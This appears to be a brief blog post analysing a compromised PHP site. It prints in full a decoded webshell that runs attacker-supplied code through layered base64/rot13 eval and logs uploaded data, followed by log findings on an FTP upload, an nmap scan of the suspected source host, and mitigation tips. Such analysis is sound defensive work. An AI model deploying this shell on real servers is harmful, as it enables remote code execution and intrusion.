When php file contains eval + gzinflate + base64_decode expect it to be malicious in nature.
eval gzinflate base64_decode PHP decoder:
http://www.tareeinternet.com/scripts/decrypt.php
After decoding the file, we get a webshell with fileupload capability.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); }
elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
Updates 25 Jan 2013:
Findings from log indicates that 3 months ago someone from 80.237.132.113 uploaded the webshell using ftp account.
Possibility of entry from ftp brute force is very high as i know the original password is not that complex.
80.237.132.113 is a webserver under construction.
80.237.132.113 could just be another victim of the intruder.Host is up (0.30s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
25/tcp open smtp Exim smtpd
80/tcp open http Apache httpd
110/tcp open pop3 Dovecot pop3d
137/tcp open netbios-ns?
138/tcp open netbios-dgm?
139/tcp open netbios-ssn?
143/tcp open imap Dovecot imapd
465/tcp open ssl/smtp Exim smtpd 4.X
587/tcp open smtp Exim
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
2195/tcp open unknown
3306/tcp open mysql MySQL 5.5.28-1~dotdeb.0-log
Mitigation:
Change password.
Monitor files.
Posts
Just came across the same EXACT thing on a client site. The code was not really well hidden. It was in the web root with the filename "default.php".
ReplyDelete